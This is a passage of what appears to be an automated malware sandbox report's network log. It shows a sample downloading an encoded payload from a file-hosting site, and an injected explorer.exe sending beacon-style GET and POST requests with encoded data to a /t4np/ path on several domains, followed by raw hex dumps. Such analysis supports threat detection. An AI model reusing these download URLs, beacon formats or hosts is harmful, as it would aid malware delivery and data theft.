                                                                            Mar 21, 2023 09:11:52.954948902 CET6137INData Raw: a4 55 65 fd b5 f6 49 56 6e 46 86 7d 3d 4e 65 57 eb 24 99 86 02 ca 2a 92 22 a9 bf 79 23 87 1f 73 ab 10 4a 9c 33 05 c1 d0 da c8 fa 6f 9d 52 c8 79 ab 14 bc 85 d5 36 78 bd 3d 84 b8 7d 7e 82 27 09 24 ca f3 85 c0 e2 fa 0e 18 e5 f2 0c ff b0 f2 79 7d 35
                                                                            Data Ascii: UeIVnF}=NeW$*"y#sJ3oRy6x=}~'$y}5]0c@BAehs+^ O*H9%Kc/_ruk]="`A()Z~'gTk>-nlW?R&itYO2{)='HvNisc=7EUw)}
                                                                            Mar 21, 2023 09:11:52.954969883 CET6138INData Raw: 62 74 41 c7 d8 bd 97 b7 ab 30 ab f3 e8 00 cc 3f 3c 09 d8 69 d9 34 55 43 11 cd b2 f9 09 0b be fe 7a 83 ca 83 a2 0e a0 95 b5 2f 82 06 cb 0f 0e 82 e9 61 21 68 e1 9f 51 a5 f4 a2 a8 fb 7e 13 da 41 89 5d 7e 64 db ae 66 17 da fb a3 66 1f 9f 9a 3d ee 68
                                                                            Data Ascii: btA0?<i4UCz/a!hQ~A]~dff=hGhIw7f]x\SuYL&y*z]*<lKhB.h7DfOn|5BqX*WM<fGGY|o5&)`AiA`hTX(1dMqS56O|W
                                                                            Mar 21, 2023 09:11:52.954998970 CET6139INData Raw: 81 0f 77 1c 64 37 cd 3c 95 06 02 24 5c 78 af 45 1c dd b0 60 91 a7 d9 57 41 36 cf 07 43 71 42 ee 34 ff 5c cd 75 76 07 42 41 2d 8d 3d bc e4 e1 aa c8 0d a5 00 e4 3d d2 c3 5d 18 e6 5a c0 90 4d d0 04 72 03 cd 12 bd 22 ad bf 03 0b bf 8e 45 35 8c 89 e4
                                                                            Data Ascii: wd7<$\xE`WA6CqB4\uvBA-==]ZMr"E5wrO-i7[oMK9f6FNZ%ux "$EsJJ6v`gA{3z#UyRP;7iB/=zTF#4JTD-o~-.r.pjjwS


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            7192.168.2.54970654.85.86.21180C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Mar 21, 2023 09:11:55.480048895 CET6140OUTGET /t4np/?ekDWdXmx=TNgCDQM1NseJ/EyvbqZD4bEVgDXmfsqsK09kjaHK361RIlxqLtgkaoztB9HOqO+kj7AmSjC7tsKJawScM9XI/2xtyFPsJZxirw==&LAIu=TchAG45 HTTP/1.1
                                                                            Host: www.brunaeleandro.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Mar 21, 2023 09:11:55.632705927 CET6142INHTTP/1.1 200 OK
                                                                            date: Tue, 21 Mar 2023 08:11:55 GMT
                                                                            content-type: text/html; charset=utf-8
                                                                            transfer-encoding: chunked
                                                                            set-cookie: AWSALB=yd9dXVWi008RLaJCiPYZ9HaXnDwF4gqR0/JrHlbRFshFbMfXoz4aViFxRwNgU/iaKh1YUVBxIL9X0hRjC51dtjd8+ZB39bJdOz8rdHPpMzomiS2f+IH+w9SV4LIj; Expires=Tue, 28 Mar 2023 08:11:55 GMT; Path=/
                                                                            set-cookie: AWSALBCORS=yd9dXVWi008RLaJCiPYZ9HaXnDwF4gqR0/JrHlbRFshFbMfXoz4aViFxRwNgU/iaKh1YUVBxIL9X0hRjC51dtjd8+ZB39bJdOz8rdHPpMzomiS2f+IH+w9SV4LIj; Expires=Tue, 28 Mar 2023 08:11:55 GMT; Path=/; SameSite=None
                                                                            server: Apache
                                                                            vary: X-Forwarded-Proto,Accept-Encoding,User-Agent
                                                                            set-cookie: session=0hlo2u8500tdjtjf4eds5m89tb; path=/; domain=.brunaeleandro.com; secure; SameSite=None
                                                                            connection: close
                                                                            Data Raw: 33 38 43 43 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 63 64 6e 2d 61 73 73 65 74 73 2d 6c 65 67 61 63 79 2e 63 61 73 61 72 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 76 3d 32 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 7c 20 43 61 73 61 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 4d 78 74 6d 44 57 69 41 4f 76 2d 53 75 34 7a 39 2d 73 55 41 79 4a 4a 4e 55 47 74 6c 68 79 56 42 4d 75 42 61 33 43 31 66 71 73 22 20 2f 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 62 72 2e 65 6e 74 65 72 70 72 69 73 65 2e 77 69 62 73 6f 6e 2e 69 6f 2f 62 61 6e 6e 65 72 2e 6a 73 3f 73 69 74 65 49 64 3d 37 38 35 30 39 65 30 30 2d 37 36 37 64 2d 34 33 32 36 2d 39 35 32 39 2d 66 30 64 35 32 33 63 38 31 33 37 63 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 65 6d 62 65 64 2e 74 79 70 65 66 6f 72 6d
                                                                            Data Ascii: 38CC<!DOCTYPE html><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="//cdn-assets-legacy.casar.com/favicon.ico?v=2" /><title>Pgina no encontrada | Casar.com</title><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="google-site-verification" content="GMxtmDWiAOv-Su4z9-sUAyJJNUGtlhyVBMuBa3C1fqs" /> <script src="https://br.enterprise.wibson.io/banner.js?siteId=78509e00-767d-4326-9529-f0d523c8137c"></script><script src="https://embed.typeform
                                                                            Mar 21, 2023 09:11:55.632738113 CET6143INData Raw: 2e 63 6f 6d 2f 65 6d 62 65 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 21 2d 2d 20 48 54 4d 4c 35 20 53 68 69 6d 20 61 6e 64 20 52 65 73 70 6f 6e 64 2e 6a 73 20 49 45 38 20 73 75 70 70 6f 72 74 20 6f 66 20 48 54 4d 4c 35 20 65 6c 65 6d
                                                                            Data Ascii: .com/embed.js"></script>... HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->...[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn
                                                                            Mar 21, 2023 09:11:55.632761955 CET6144INData Raw: 2e 73 72 63 3d 76 3b 73 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 5b 30 5d 3b 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 74 2c 73 29 7d 28 77 69 6e 64 6f 77 2c 0a 64 6f 63 75
                                                                            Data Ascii: .src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,document,'script','https://connect.facebook.net/en_US/fbevents.js');fbq('init', '912779795420526');fbq('track', 'PageView');</script><noscript><img height="1" wi
                                                                            Mar 21, 2023 09:11:55.632783890 CET6146INData Raw: 43 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 22 3e 0a 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6c 6f 61 64 69 6e 67 2d 73 69 74 65 22 20 73 74 79 6c 65 3d 22 62
                                                                            Data Ascii: C');</script> </head> <body class=""> <div id="loading-site" style="background: #fff; height: 100vh; left: 0; position: fixed; top: 0; width: 100vw; z-index: 99999"> <div style="left: 50%; margin-left: -29px; margin-top: -38px;
                                                                            Mar 21, 2023 09:11:55.632818937 CET6147INData Raw: 39 37 35 37 20 43 37 33 2e 30 34 32 35 32 35 38 2c 39 39 2e 35 37 35 36 30 36 20 39 34 2e 36 37 38 36 33 37 32 2c 38 33 2e 34 31 32 30 33 37 37 20 31 30 31 2e 34 30 31 39 36 33 2c 36 30 2e 38 36 33 35 30 37 35 20 43 31 30 31 2e 38 33 38 30 33 38
                                                                            Data Ascii: 9757 C73.0425258,99.575606 94.6786372,83.4120377 101.401963,60.8635075 C101.838038,59.4024901 100.727808,57.9305333 99.2057979,57.9305333 L93.0157225,57.9305333 C91.7585152,57.9305333 90.6264214,58.7120926 90.1988495,59.897194 C84.175187,76.60
                                                                            Mar 21, 2023 09:11:55.632841110 CET6148INData Raw: 35 38 20 4d 31 39 2e 33 35 35 39 32 32 37 2c 37 2e 36 38 36 38 37 35 35 38 20 4c 31 36 2e 38 35 36 32 36 35 31 2c 32 2e 36 33 37 34 35 31 32 38 20 4c 31 36 2e 38 36 32 37 32 30 38 2c 32 2e 36 33 37 34 35 31 32 38 20 43 31 38 2e 38 30 30 37 33 30
                                                                            Data Ascii: 58 M19.3559227,7.68687558 L16.8562651,2.63745128 L16.8627208,2.63745128 C18.8007301,2.63745128 20.5734728,3.74551581 21.4411226,5.50166925 L23.9330333,10.5472282 C21.9963151,10.5472282 20.2261547,9.43916368 19.3559227,7.68687558" id="Fill-23">
                                                                            Mar 21, 2023 09:11:55.632863998 CET6150INData Raw: 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 70 75 6c 6c 2d 6c 65 66 74 20 6c 6f 67 6f 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 63 61 73 61 72 2e 63 6f 6d 22 3e 0a 20 20 20 20 20 20 3c 69 6d 67 20 0a 20 20 20 20 20 20 73 72 63 3d 22 2f 2f 63 64 6e
                                                                            Data Ascii: <a class="pull-left logo" href="//www.casar.com"> <img src="//cdn-assets-legacy.casar.com/img/layout/rebranding/logo-casarpontocom-anel-70.png" alt="Logo Casar Site de casamento" style="height: 30px; width: auto;"
                                                                            Mar 21, 2023 09:11:55.632886887 CET6151INData Raw: 79 6c 65 3d 22 6d 61 78 2d 77 69 64 74 68 3a 20 31 33 34 70 78 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 73
                                                                            Data Ascii: yle="max-width: 134px" /> <img class="second_logo" src="//cdn-assets-legacy.casar.com/img/layout/rebranding/logo-casarpontocom-anel-70.png" alt="Logo Casa
                                                                            Mar 21, 2023 09:11:55.632909060 CET6152INData Raw: 73 65 63 2d 64 65 73 6b 22 20 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 3d 22 64 72 6f 70 35 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 61 74 69 76 6f 22 3e 3c
                                                                            Data Ascii: sec-desk" aria-labelledby="drop5"> <li class="ativo"><a href="https://www.casar.com" class="destaque">Home</a></li> <li><a href="https://www.casar.com/assunto/casamentos/casamentos-reais/
                                                                            Mar 21, 2023 09:11:55.632930994 CET6154INData Raw: 46 6f 72 6e 65 63 65 64 6f 72 65 73 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 2d 2d 3e 0a 20 20 20 20
                                                                            Data Ascii: Fornecedores </a> ...--> </li> <li class=" dropdown"> <a href="#" class="dropdown-toggle" d
                                                                            Mar 21, 2023 09:11:55.777327061 CET6155INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 09 09 20 20 20 20 3c 6c 69 20 63 6c 61
                                                                            Data Ascii: </ul> </li> <li class=" dropdown"> <a href="#" class="dropdown-toggle" data-toggle="dropdown" onclick="tr


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            8192.168.2.549707172.67.152.2480C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Mar 21, 2023 09:12:02.879838943 CET6176OUTPOST /t4np/ HTTP/1.1
                                                                            Host: www.madisoncountylincoln.com
                                                                            Connection: close
                                                                            Content-Length: 190
                                                                            Cache-Control: no-cache
                                                                            Origin: http://www.madisoncountylincoln.com
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://www.madisoncountylincoln.com/t4np/
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Data Raw: 65 6b 44 57 64 58 6d 78 3d 57 35 41 4e 77 46 37 41 6f 31 54 79 6c 39 48 44 32 33 6e 46 6f 72 65 6d 49 65 45 44 6d 4b 74 4b 49 6e 49 49 31 5a 5a 67 41 30 4a 48 52 41 69 31 4f 6d 58 56 35 31 7a 52 32 68 76 4b 33 6a 38 71 68 44 63 6f 72 45 6d 4e 78 52 67 32 44 36 6d 4b 58 75 33 48 5a 56 51 57 47 33 32 71 58 63 4a 6b 78 4d 69 49 31 57 65 37 33 41 75 6f 75 73 6d 4d 71 46 6c 57 6a 75 75 48 49 4d 56 68 64 6e 64 67 6e 48 4d 78 47 5f 56 47 57 48 6b 69 7a 4b 34 5a 34 62 42 7a 52 37 7a 52 61 75 6e 30 48 33 54 44 76 43 6c 52 7e 57 38 30 37 57 59 68 46 63 44 73 6e 67 29 2e 00 00 00 00 00 00 00 00
                                                                            Data Ascii: ekDWdXmx=W5ANwF7Ao1Tyl9HD23nForemIeEDmKtKInII1ZZgA0JHRAi1OmXV51zR2hvK3j8qhDcorEmNxRg2D6mKXu3HZVQWG32qXcJkxMiI1We73AuousmMqFlWjuuHIMVhdndgnHMxG_VGWHkizK4Z4bBzR7zRaun0H3TDvClR~W807WYhFcDsng).
                                                                            Mar 21, 2023 09:12:03.137469053 CET6177INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 21 Mar 2023 08:12:03 GMT
                                                                            Content-Type: text/html;charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: store_session=9fd82tovui4062jsi2krb883uj; expires=Tue, 21-Mar-2023 09:11:05 GMT; Max-Age=3600; path=/; SameSite=Lax
                                                                            Vary: Accept-Encoding,User-Agent
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KWaFRMSY0lCpPiDwf8DPuoaa0gu1Sb1Kcm8IfI25sJnbf5w3hc1ru9gPYcFjKOGzU60ooqcsEsBwFrc261uXwRK6O8iqCp6UGCkkqv2DM%2FuJG%2BATv00MSmQZDFv9Z0Mx7Yt4facPX%2F%2BwNWqW6fAZ"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 7ab4ba46084491e3-FRA
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                            Data Raw: 31 61 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 93 41 8b d4 40 10 85 ef fe 8a ba ed 65 26 d9 a8 2b 12 e3 80 08 b2 82 88 88 ee bd 92 ae a4 8b a9 74 85 ee ce 66 a3 f8 df a5 33 2e 9b 10 f6 60 9f 52 5d c5 f7 5e d7 23 95 8d bd 9c 5e 00 00 54 96 d0 5c 3e 97 32 72 14 3a 7d c3 8e e0 ab 46 f8 a4 a3 33 55 7e b9 7d 9a 0a 71 5e d7 e9 d4 6a e6 df 9b 9b 74 7a f4 1d bb f2 fa dd ae 33 a0 31 ec ba f2 d5 f5 f0 b0 ef b6 ea 62 59 bc 1c 1e f2 22 bb 81 5b 92 7b 8a dc e0 e1 83 67 94 c3 1d 79 83 0e 0f 01 5d 38 06 f2 dc 6e 09 7f 36 95 2d fe c7 57 52 3e 06 fe 45 e5 eb b7 cf 39 3b 4e c4 9d 8d a5 53 df a3 ec 67 84 1d 1d ed 65 66 4f d9 ba 0b d1 ab eb f6 0e 0d 87 41 70 2e d9 2d b4 5a b4 39 ef 95 26 36 d1 96 6f 6e 9e d7 a8 f2 55 58 55 fe 14 77 95 12 5b 65 6a 8b 5d ec b6 58 f5 87 6d de 3f 2c c1 90 e6 67 1d 01 3d 81 a8 9e d9 75 d0 aa 87 46 47 31 e0 34 42 4d d0 26 58 06 1f 2d 35 67 88 96 00 8d f1 14 02 d4 e8 37 c8 a8 40 2e 8c 7e 61 7a f8 f9 fd 0b 70 80 30 90 08 19 68 d4 7b 6a a2 cc 19 7c 6e 01 45 80 24 10 b4 c8 12 0e 8b 8b 06 dd 86 77 cf 81 23 24 94 d5 fe 9f 5b 8c 8b 05 61 77 86 9a 44 a7 6c b5 a9 d5 13 2b 04 eb a9 7d 7f 65 63 1c ca 3c 9f a6 29 eb d1 70 50 d7 e8 e8 e2 2c ec 1a 15 97 35 da e7 57 a7 bb 45 2a 91 6f 93 54 5a 64 95 e3 e3 d2 2f 9b ae f2 e5 b7 fb 0b 00 00 ff ff 03 00 16 97 a9 87 7d 03 00 00 0d 0a
                                                                            Data Ascii: 1a8A@e&+tf3.`R]^#^T\>2r:}F3U~}q^jtz31bY"[{gy]8n6-WR>E9;NSgefOAp.-Z9&6onUXUw[ej]Xm?,g=uFG14BM&X-5g7@.~azp0h{j|nE$w#$[awDl+}ec<)pP,5WE*oTZd/}
                                                                            Mar 21, 2023 09:12:03.137500048 CET6177INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            9192.168.2.549708172.67.152.2480C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Mar 21, 2023 09:12:05.458389997 CET6178OUTGET /t4np/?LAIu=TchAG45&ekDWdXmx=b7otzynn0HmortmfwUeY4rOKK/wDsahaMH4CpYcAMUMZFiGwLHjB+0Oq1wXjzAJPnkBdjV2xmRY1HYDRMeq0YWMvPw2aK61dkA== HTTP/1.1
                                                                            Host: www.madisoncountylincoln.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Mar 21, 2023 09:12:05.708584070 CET6179INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 21 Mar 2023 08:12:05 GMT
                                                                            Content-Type: text/html;charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: store_session=vcue9caqutq1egitp5nphb1rt3; expires=Tue, 21-Mar-2023 09:11:07 GMT; Max-Age=3600; path=/; SameSite=Lax
                                                                            Vary: Accept-Encoding,User-Agent
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3zhXmDCjpuF5r%2Bb9vkduN0KPsoBeKDzLZNY3uaKncUAAqPX6SkIDrpdCezdg4FjjcIBL%2FNo4lSZYEpqmzFAP2h8MVNRFhOst32YstoJPL4qiU5v6bAiqgArzH4QLWvfQu6cu8Y6vH%2BC8E3DIy%2F6M"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 7ab4ba562b803a8e-FRA
                                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                            Data Raw: 33 37 64 0d 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 31 32 70 78 2f 31 2e 35 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 56 65 72 64 61 6e 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 34 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6e 67 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 36 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c
                                                                            Data Ascii: 37d<html> <head> <title>Page Not Found</title> <style> body{ margin:0; padding:30px; font:12px/1.5 Helvetica,Arial,Verdana,sans-serif; } h1{ margin:0; font-size:48px; font-weight:normal; line-height:48px; } strong{ display:inline-block; width:65px; } </styl
                                                                            Mar 21, 2023 09:12:05.708636999 CET6179INData Raw: 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                            Data Ascii: e> </head> <body> <h1>Page Not Found</h1> <p> The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can
                                                                            Mar 21, 2023 09:12:05.708668947 CET6179INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.2.549698188.40.83.211443C:\Users\user\Desktop\SC_0017384.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            2023-03-21 08:10:10 UTC0OUTGET /fwvfviJb.dat HTTP/1.1
                                                                            Host: a.uguu.se
                                                                            Connection: Keep-Alive
                                                                            2023-03-21 08:10:10 UTC0INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Tue, 21 Mar 2023 08:10:10 GMT
                                                                            Content-Type: application/octet-stream
                                                                            Content-Length: 2000896
                                                                            Last-Modified: Mon, 20 Mar 2023 22:39:50 GMT
                                                                            Connection: close
                                                                            ETag: "6418e0b6-1e8800"
                                                                            X-XSS-Protection: 1; mode=block
                                                                            X-Content-Type-Options: nosniff
                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                            Content-Security-Policy: default-src 'self' http: https: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Accept-Ranges: bytes
                                                                            2023-03-21 08:10:10 UTC0INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                            2023-03-21 08:10:10 UTC16INData Raw: 73 63 75 62 33 55 33 36 37 38 44 41 41 39 37 33 42 6e 74 57 46 52 4e 2f 7a 69 6e 37 54 66 48 45 6e 6b 4b 56 73 61 71 78 46 6d 55 58 7a 76 35 79 75 42 66 35 35 46 50 75 53 61 78 77 52 70 70 53 52 57 42 53 48 4f 77 39 6c 4f 74 58 6f 57 61 34 44 6f 36 49 73 72 55 35 37 6b 32 2f 54 62 41 79 50 42 72 79 73 38 50 72 36 57 32 76 56 61 46 44 4e 51 62 54 6b 4d 68 44 4d 72 50 79 53 31 76 43 31 6b 73 31 66 47 76 7a 4d 5a 69 4a 63 47 2f 65 53 73 37 62 45 5a 57 33 4e 62 2f 64 35 4b 76 41 4a 6e 34 79 4f 79 7a 47 53 48 4e 48 75 66 69 54 6e 43 36 73 7a 7a 75 39 6a 71 63 61 74 6c 2b 4b 55 6d 72 4a 4a 46 42 75 63 72 41 41 68 7a 4d 64 39 41 65 45 73 4e 74 44 32 43 71 36 70 67 74 66 4e 7a 56 4f 7a 2b 6e 35 69 77 36 68 78 36 33 75 45 71 6a 37 30 79 37 4c 51 51 66 74 5a 54 50
                                                                            Data Ascii: scub3U3678DAA973BntWFRN/zin7TfHEnkKVsaqxFmUXzv5yuBf55FPuSaxwRppSRWBSHOw9lOtXoWa4Do6IsrU57k2/TbAyPBrys8Pr6W2vVaFDNQbTkMhDMrPyS1vC1ks1fGvzMZiJcG/eSs7bEZW3Nb/d5KvAJn4yOyzGSHNHufiTnC6szzu9jqcatl+KUmrJJFBucrAAhzMd9AeEsNtD2Cq6pgtfNzVOz+n5iw6hx63uEqj70y7LQQftZTP
